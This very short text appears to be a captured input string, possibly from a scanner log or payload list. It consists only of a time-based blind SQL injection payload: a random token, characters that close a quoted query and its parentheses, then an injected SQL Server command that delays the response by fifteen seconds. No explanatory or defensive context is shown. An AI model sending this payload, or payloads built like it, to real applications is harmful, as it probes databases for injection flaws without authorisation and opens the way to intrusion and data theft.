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555D8NQswOF')); waitfor delay '0:0:15'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